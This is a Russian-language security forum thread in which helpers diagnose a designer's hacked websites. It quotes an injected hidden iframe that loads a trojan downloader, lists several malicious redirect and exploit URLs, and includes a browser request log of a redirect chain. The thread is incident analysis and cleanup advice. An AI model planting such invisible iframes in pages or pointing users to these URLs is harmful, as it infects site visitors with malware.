-
Junior Member
- Вес репутации
- 56
При открытии сайта JS:Packed-AC [Trj]
Здравствуйте. Я дизайнер и у меня пара сайтов в сети. Вчера, при заходе на них антивирус выдает следующее:
hxxp://plebania.sitehost.pl/cstrike/models/player/lduke/adminctv1/system/index.php JS : Packed-AC [Trj] Визуально, в хтмл нет никаких ошибок.
Что это может быть и как это лечить? Это у меня вирусы или на сервере?
Примеры .)
grishaeva.com/
creativeangel.ru/
Последний раз редактировалось uberdog; 19.01.2009 в 23:39.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Это может означать, что Вас вскрыли и заразили.
Все страницы проверяем на лишний код + заходите в раздел "Помогите!".
Провериться не помешает.
Павел
AVZ HijackThis помощь с 10-00 до 18-00МСК
Windows7, SEP(work)
WindowsXP KIS(home)
На up не реагирую
-
-
Junior Member
- Вес репутации
- 56
Сайт гришаевой был загружен пол года назад. Я его не перезагружал в последнее время.
Как проверить страницы которые висят в интернет?
-
на главной странице сайта creativeangel.ru видим такое:
Код:
<iframe src="http://litedownloadseek.cn/in.cgi?cocacola10" width=1 height=1 style="visibility: hidden">
разве это Ваш код?)
(на сайте гришаевой такой же код, кстати - видимо ломанули ваш комп - угнали акки фтп скорее всего)
PS: сделайте ссылки неактивными!!!
-
Junior Member
- Вес репутации
- 56
Гм...Вроде не мой, может фотошоп написал.)
Видимо были вирусы, сейчас нету.
То-есть не активными?
Спасибо за код!
-
Сообщение от
uberdog
Визуально, в хтмл нет никаких ошибок.
Да ну ... а это (c http://www.grishaeva.com/) -
Код:
<iframe src="hxxp://litedownloadseek.cn/in.cgi?cocacola10" width=1 height=1 style="visibility: hidden"></iframe>
уже так ... мелочь ?
Сообщение от
uberdog
Гм...Вроде не мой, может фотошоп написал.)
Видимо были вирусы, сейчас нету.
Какой шоп ? Это загрузчики троянов с китаёзных сайтов, ссылка с grishaeva.com взята минут 10 назад.
Последний раз редактировалось RiC; 19.01.2009 в 23:46.
-
-
Видимо были вирусы, сейчас нету.
Может и нет, а может и есть. Откуда Вы знаете?..
Выполнить правила раздела "Помогите!" не помешает в любом случае - много времени это не займет, но если вредоносное ПО на Вашем компьютере присутствует - оно будет удалено с помощью хелперов и АВЗ (т.к то, что Ваш антивирус не находит ничего на компе - это не значит, что там ничего нет)
кликнув по ссылкам в вашем первом сообщении можно перейти на сайты - этого не должно быть, т.к они заражены - поэтому могут заразиться другие. Сотрите перед ними http:// - оставьте только сами названия - так по ним нельзя будет перейти кликнув по ним.
его и аналогичные коды нужно удалить. все пароли поменять.
-
Junior Member
- Вес репутации
- 56
Сообщение от
RiC
Да ну ... а это (c http:
//www
.grishaeva.com/) -
Код:
<iframe src="hxxp://litedownloadseek.cn/in.cgi?cocacola10" width=1 height=1 style="visibility: hidden"></iframe>
уже так ... мелочь ?
Не заметил .)
Добавлено через 21 минуту
Спасибо ребята, я понял и все исправил. Вы нереально круты!!!
Хотя регулярно проверяюсь и AVZ и drWeb и недавно поставил Tool Remooval. Может он виноват .) У меня антивирус аваст.
Кстати на работе Нод 32 ругается на Tool.
Последний раз редактировалось uberdog; 19.01.2009 в 23:58.
Причина: Добавлено
-
Сообщение от
RiC
Какой шоп ? Это загрузчики троянов с китаёзных сайтов, ссылка с grishaeva.com взята минут 10 назад.
Угу.
Из чистого занудства - это такие же китайцы, как и мы с вами .
Сайты .cn, а трояны чьи угодно.
-
-
Методом тыка нашел вот эту ссылку: хттп://a2format.ru//includes/js/dtree/img/system/pdf.php?id=568
От куда можно скачать "EXP/Pidief.IM.1". http://www.virustotal.com/ru/analisi...5f06d0990126e9
-
-
Junior Member
- Вес репутации
- 56
Добрый день.
Теперь, поисковики находят вирусы!
По вашему советы все очистил. На сайте вирусов нет. Когда вбиваешь в строку адрес grishaeva.com/тоже заходит нормально, разные антивриусы реагируют спокойно. Почему гугл не пускает, а яндекс отправляет на ake.kz/in.cgi?7
Проверил код, вроде чистый. И он лайн сканеры ничего не находят.
Может ли ссылка с вирусом лежать в кэше браузеров и оттуда, по старой памяти, отправлять на левые сайты?
-
Сайт попавший в чёрный список по идее исключается из поисковиков, у Вас компик заражён, похоже что DNS-Poisoning
-
-
Junior Member
- Вес репутации
- 56
valho, И чем это лучше убить?
Кьюре Ит не находит ничего.
-
Сообщение от
uberdog
valho, И чем это лучше убить?
Кьюре Ит не находит ничего.
Вам лучше сюда http://virusinfo.info/forumdisplay.php?f=46
-
-
-
-
Junior Member
- Вес репутации
- 56
valho,
Спасибо, попробую. А у вас через яндекс заходит без проблем, за запрос grishaeva.ru?
AndreyKa,
В гугле проверяют, на яндексе отправли лечиться
help.yandex.ru/search/?id=1061421
help.yandex.ru/search/?id=1061422
-
Сообщение от
uberdog
valho,
Спасибо, попробую. А у вас через яндекс заходит без проблем, за запрос grishaeva.ru?
AndreyKa,
В гугле проверяют, на яндексе отправли лечиться
help.yandex.ru/search/?id=1061421
help.yandex.ru/search/?id=1061422
В фарефоксе только, в IE стопорится на clck.yandex.ru/redir/AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW99KUdgowt9XvqxGyo_r nZJmgDID1if_xg9b3UiNNFJpG_X0Jno3h-93QDOZlrckanJrzqmrPkr7nk5Ski5uggDVzT_r9anGhd?data= UlNrNmk5WktYejR0eWJFYk1LdmtxcUJoVTl3NHZscHY2SkpSOV JGTzhfYVJmUUk0Q01rSjdnMnJTTk9YbTRYM0JHaWZ6QUF3UmVS c3hrczMwb2M5VmpwenZJRlpiQmstY3NvdHhRRUV5Znc&b64e=2 &sign=c8be6d7b3792916df8b0782f3c7548bd&keyno=0
вроде потом стало нормально
Ещё в опере попробовал там адрес высвечивается ake.kz/in.cgi?7
В хроме выводит на esli.tw/1/show.php?s=5eb86eb44c
может это из за гугла?
-
-
Junior Member
- Вес репутации
- 56
Да...через хром и яндекс даже антивирус ругается на ake.kz/in.cgi?7
Что это может быть вообще? Откуда берется редирект?
-
Лог когда жмахаеш на яндексе на grishaeva.com
кста на grishaeva.ru почти тоже самое, нашёл ещё несколько заражённых сайтов там так же всё, только на них видно что они заражены и почему то фигурирует ask.com
Код HTML:
00:00:00.000 grishaeva.com*- Яндекс: нашлось 4211 страниц
+ 0.000 0.066 550 131 GET 200 image/gif [url]http://clck.yandex.ru/click/dtype=iweb/path=12.13/cltr=4/reg=225/u=1251751156050/reqid=1251750980-64702741494/*http://grishaeva.com/[/url]
0.066 550 131 1 request
00:00:00.166 Ask.com Search Engine - Better Web Search
+ 0.000 0.202 469 532 GET 301 Redirect to [url]http://ake.kz/in.cgi?7[/url] [url]http://grishaeva.com/[/url]
+ 0.231 0.186 470 495 GET 302 Redirect to [url]http://ask.com[/url] [url]http://ake.kz/in.cgi?7[/url]
+ 0.419 0.701 463 12427 GET 200 text/html;charset=UTF-8 [url]http://ask.com/[/url]
+ 1.117 0.181 596 13566 GET 200 image/png [url]http://sp.ask.com/sh/i/a11/hp/homepage_sprite_04.png[/url]
+ 1.331 0.165 602 486 GET 302 Redirect to [url]http://www.ask.com/inc/js/a11/a11hp_c.r47827.js[/url] [url]http://ask.com/inc/js/a11/a11hp_c.r47827.js[/url]
+ 1.334 0.358 649 293 GET 200 image/gif [url]http://wzus1.ask.com/i/i.gif?t=a&d=us&s=a&c=h&ti=2&ai=20014&l=dir&o=0&sv=0a5c4247&ip=558da7a2&ord=6180231[/url]
+ 1.336 0.363 660 1195 GET 302 Redirect to [url]http://wzus1.ask.com/i/i.gif?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c4247&p=homepage&rf=yandex.ru%2Fyandsearch&ord=6180231&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&[/url] [url]http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c4247&p=homepage&rf=yandex.ru%2Fyandsearch&ord=6180231[/url]
+ 1.340 0.367 597 477 GET 302 Redirect to [url]http://www.ask.com/inc/js/a11/swfobject.js[/url] [url]http://ask.com/inc/js/a11/swfobject.js[/url]
+ 1.343 0.256 372 603 GET 200 text/html [url]http://p.opt.fimserve.com/bht/?px=1196&v=1&rnd=18915[/url]
+ 1.347 0.188 357 9481 GET 200 text/javascript [url]http://www.google-analytics.com/ga.js[/url]
+ 1.565 0.263 621 26109 GET 200 application/x-javascript [url]http://www.ask.com/inc/js/a11/a11hp_c.r47827.js[/url]
+ 1.731 0.337 888 293 GET 200 image/gif [url]http://wzus1.ask.com/i/i.gif?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c4247&p=homepage&rf=yandex.ru%2Fyandsearch&ord=6180231&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&[/url]
+ 1.764 0.098 740 2471 GET 200 application/x-javascript [url]http://www.ask.com/inc/js/a11/swfobject.js[/url]
2.068 7484 68428 13 requests
00:00:01.526 0.361 589 453 GET 302 Redirect to [url]http://www.ask.com/favicon.ico[/url] [url]http://ask.com/favicon.ico[/url]
00:00:01.965 0.174 702 1396 GET 200 text/plain [url]http://www.ask.com/favicon.ico[/url]
00:00:02.087 Ask.com Search Engine - Better Web Search
+ 0.000 0.198 721 17674 GET 200 image/png [url]http://sp.ask.com/sh/i/a11/hp/peel/peel_newskin_6.png[/url]
0.198 721 17674 1 request
00:00:02.106 0.181 713 452 GET 302 Redirect to [url]http://www.ask.com/favicon.ico[/url] [url]http://ask.com/favicon.ico[/url]
00:00:02.112 Ask.com Search Engine - Better Web Search
+ 0.000 120.303 725 7255 GET 200 text/html;charset=UTF-8 [url]http://www.ask.com/hpstatic[/url]
+ 0.155 0.093 911 328 GET 200 image/gif [url]http://www.google-analytics.com/__utm.gif?utmwv=4.3.1&utmn=1920798491&utmhn=ask.com&utmcs=UTF-8&utmsr=1024x600&utmsc=32-bit&utmul=ru&utmje=1&utmfl=10.0%20r32&utmcn=1&utmdt=Ask.com%20Search%20Engine%20-%20Better%20Web%20Search&utmhid=1506658785&utmr=http://yandex.ru/yandsearch?text=grishaeva.com&stpar2=%2Fh0%2Ftm8%2Fs1&stpar4=%2Fs1&utmp=/&utmac=UA-5081537-3&utmcc=__utma%3D252994457.3672992468607816000.1251751158.1251751158.1251751158.1%3B%2B__utmz%3D252994457.1251751158.1.1.utmcsr%3Dyandex%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3Dgrishaeva.com%3B[/url]
+ 2:00.278 0.096 931 1098 GET 200 application/x-javascript [url]http://www.ask.com/inc/js/a10f/blogsadvanced_c.r29093.js[/url]
+ 2:00.403 0.139 947 10988 GET 200 image/gif [url]http://sp.ask.com/sh/i/a10f/hp/spinner.gif[/url]
+ 2:00.409 0.159 933 339 GET 200 image/gif [url]http://sp.ask.com/i/pixl.gif[/url]
+ 2:00.412 0.187 946 2661 GET 200 image/png [url]http://sp.ask.com/sh/i/a11/hp/preview.png[/url]
+ 2:00.418 0.208 947 4101 GET 200 image/png [url]http://sp.ask.com/sh/i/a10f/hp/preview.png[/url]
+ 2:00.854 0.172 956 496 GET 302 Redirect to [url]http://www.ask.com/inc/js/a11/a11mystuff_c.r47005.js[/url] [url]http://ask.com/inc/js/a11/a11mystuff_c.r47005.js[/url]
+ 2:01.373 0.179 975 10420 GET 200 application/x-javascript [url]http://www.ask.com/inc/js/a11/a11mystuff_c.r47005.js[/url]
+ 2:01.584 0.091 924 572 GET 200 text/css;charset=UTF-8 [url]http://www.ask.com/dcss/a11/skinshp.r32645.css[/url]
+ 2:01.587 * 923 0 GET * * [url]http://www.ask.com/dcss/a11/dialog.r47126.css[/url]
+ 2:01.591 * 928 0 GET * * [url]http://www.ask.com/dcss/a11/skinssprite.r46242.css[/url]
+ 2:01.595 * 0 0 GET * * [url]http://www.ask.com/dcss/a11/settings.r47126.css[/url]
+ 2:01.599 * 0 0 GET * * [url]http://www.ask.com/dcss/a11/askeraser.r30356.css[/url]
+ 2:01.603 * 0 0 GET * * [url]http://www.ask.com/dcss/a11/signin.r45653.css[/url]
+ 2:01.607 0.160 926 1001 GET 200 text/css;charset=UTF-8 [url]http://www.ask.com/dcss/a11/skinshare.r34027.css[/url]
+ 2:01.612 * 927 0 GET * * [url]http://www.ask.com/dcss/a11/skinfriend.r34027.css[/url]
+ 2:01.616 * 0 0 GET * * [url]http://www.ask.com/dcss/a11/sendemailmessage.r39410.css[/url]
+ 2:01.619 * 0 0 GET * * [url]http://www.ask.com/dcss/a11/forgotpasswd.r45653.css[/url]
+ 2:01.622 * 0 0 GET * * [url]http://www.ask.com/dcss/a11/forgotemailmessage.r45262.css[/url]
121.776 12899 39259 20 requests
00:00:04.524 0.176 968 452 GET 302 Redirect to [url]http://www.ask.com/favicon.ico[/url] [url]http://ask.com/favicon.ico[/url]
00:00:04.717 0.066 0 0 GET (Cache) text/plain [url]http://www.ask.com/favicon.ico[/url]
00:00:32.418 0.967 454 175136 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-malware-shavar_a_13761-13840.13761-13840.:[/url]
00:00:34.368 0.913 454 191238 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-malware-shavar_a_13841-13920.13841-13920.:[/url]
00:00:36.192 0.163 465 27102 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-malware-shavar_a_13921-14080.13921-13940.13941-14080:[/url]
00:00:36.502 0.093 452 14574 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46401-46560.46401-46560.:[/url]
00:00:36.646 0.124 452 18152 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46561-46720.46561-46720.:[/url]
00:00:36.818 0.081 452 11281 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46721-46880.46721-46880.:[/url]
00:00:36.926 0.032 463 905 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46881-47040.46881-46888.46889-47040:[/url]
00:00:36.968 0.320 476 63790 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64321-64480.64321-64354,64356-64428,64430-64480.:[/url]
00:00:37.542 0.297 488 59145 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64481-64640.64481-64577,64579-64580,64582-64587,64589-64640.:[/url]
00:01:14.183 [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46721-46880.46721-46880.:[/url]
+ 0.000 1.519 452 11281 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46721-46880.46721-46880.:[/url]
1.519 452 11281 1 request
00:01:38.110 0.131 560 19027 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64641-64800.64641-64661,64663-64682,64684-64695,64697-64700,64704-64710,64712-64764,64766-64769,64771-64772,64774-64775,64777-64800.:[/url]
00:01:38.477 0.181 512 32422 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64801-64960.64801-64817,64819-64823,64826-64848,64850-64899,64902-64943,64945-64960.:[/url]
00:01:38.806 0.176 463 32483 GET 200 application/vnd.google.safebrowsing-chunk [url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64961-65120.64961-65061.65062-65120:[/url]
00:01:41.705 0.338 938 453 GET 302 Redirect to [url]http://www.ask.com/favicon.ico[/url] [url]http://ask.com/favicon.ico[/url]
00:01:42.043 0.021 0 0 GET (Cache) text/plain [url]http://www.ask.com/favicon.ico[/url]
00:01:49.270 0.172 938 452 GET 302 Redirect to [url]http://www.ask.com/favicon.ico[/url] [url]http://ask.com/favicon.ico[/url]
00:01:49.442 0.029 0 0 GET (Cache) text/plain [url]http://www.ask.com/favicon.ico[/url]
00:02:02.979 0.340 938 453 GET 302 Redirect to [url]http://www.ask.com/favicon.ico[/url] [url]http://ask.com/favicon.ico[/url]
00:02:03.490 0.003 0 0 GET (Cache) text/plain [url]http://www.ask.com/favicon.ico[/url]
Уберите вот это grishaeva.com/favicon.ico и посмотрите как будет яндекс выдавать
оттуда редирект идёт прямо на ake.kz
Млин он там на самом видном месте
//<link rel="shortcut Icon" href="/favicon.ico" type="image/x-icon">
Сто пудов Вам её подменили так как её не видно при заходе на сайт, а на яндексе в кэше она есть
Последний раз редактировалось valho; 01.09.2009 в 02:15.
Причина: добавлено
-
-
Junior Member
- Вес репутации
- 56
Недели две назад переименовал favicon.ico в iconka. Видмо не помогло.
Спасибо, попробую удалить.